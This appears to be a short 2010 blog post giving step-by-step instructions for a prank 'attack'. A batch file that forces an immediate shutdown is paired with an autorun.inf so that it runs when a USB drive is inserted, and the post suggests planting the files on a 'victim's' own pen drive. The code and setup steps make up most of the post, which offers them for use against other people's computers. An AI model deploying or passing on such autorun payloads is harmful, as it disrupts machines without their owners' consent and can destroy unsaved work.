twitter
    Find out what I'm doing, Follow Me :)

Saturday, December 4, 2010

Trick To Shutdown Someone's Computer Using Pendrive

Here is a trick to make someone's computer shutdown when ever he/she inserts his/her pen-drive.

Just follow these simple steps to accomplish the attack:

Step 1: Copy this code into notepad:

@echo off
shutdown -s -t 00


Save it with .bat extension (for eg: clickme.bat).

Step 2: Now open the notepad and copy this code:

[autorun]
Open=filename.bat
Action=Mouse Disable


Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat (for eg: acc. to above case the filename assigned to "open" filed would be "clickme.bat").

Step 3: Then copy the two files in your pen drive or victim's pen drive.

That's all whenever the victim inserts his pen drive or your pen-drive, the system will be turned off automatically.

No comments:

Post a Comment